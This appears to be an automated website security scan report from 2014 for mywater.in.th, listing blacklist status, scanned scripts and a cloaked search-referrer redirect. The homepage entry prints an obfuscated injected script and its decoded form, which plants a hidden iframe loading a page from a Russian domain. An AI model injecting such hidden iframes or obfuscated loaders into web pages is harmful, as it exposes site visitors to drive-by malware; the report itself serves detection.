Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mywater.in.th
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.mywater.in.th/ | 200 OK Content-Length: 24474 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: yqdazyb.ru c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Date().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i81i73i6 ...[1454 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://yqdazyb.ru/count6.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://yqdazyb.ru/count6.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... | ||
http://www.mywater.in.th/js/jquery.min.js | 200 OK Content-Length: 54075 Content-Type: application/javascript | clean |
http://www.mywater.in.th/js/jquery.validate.js | 200 OK Content-Length: 36436 Content-Type: application/javascript | clean |
http://www.mywater.in.th/js/validate.config.js | 200 OK Content-Length: 6344 Content-Type: application/javascript | clean |
http://www.mywater.in.th/FCKeditor/fckeditor.js | 200 OK Content-Length: 9608 Content-Type: application/javascript | clean |
http://www.mywater.in.th/highslide/highslide.js | 200 OK Content-Length: 45246 Content-Type: application/javascript | clean |
http://www.mywater.in.th/highslide/highslide-html.js | 200 OK Content-Length: 13700 Content-Type: application/javascript | clean |
http://www.mywater.in.th/java.js | 200 OK Content-Length: 656 Content-Type: application/javascript | clean |
http://www.mywater.in.th/cbjscbinsmenu2.js | 404 Not Found Content-Length: 334 Content-Type: text/html | clean |
http://www.mywater.in.th/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://www.mywater.in.th/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.mywater.in.th Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Dec 2014 20:22:24 GMT Location: http://60209.dancesearcy.com/url?sa=N&source=web&cd=30&ved=0GgTvjQlf&url=http://www.mywater.in.th/&ei=2ZErfajH6ayzpY2Ox1I595q1pw==&usg=xyZCO2H9LGA33pXtsO0LzC&sig2=7Zf5kgEos0yjje6dXooXBr Server: nginx/1.6.2 Content-Length: 397 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: frx=19; path=/; domain=www.mywater.in.th; expires=Sun, 28-Dec-2014 10:08:24 GMT | suspicious |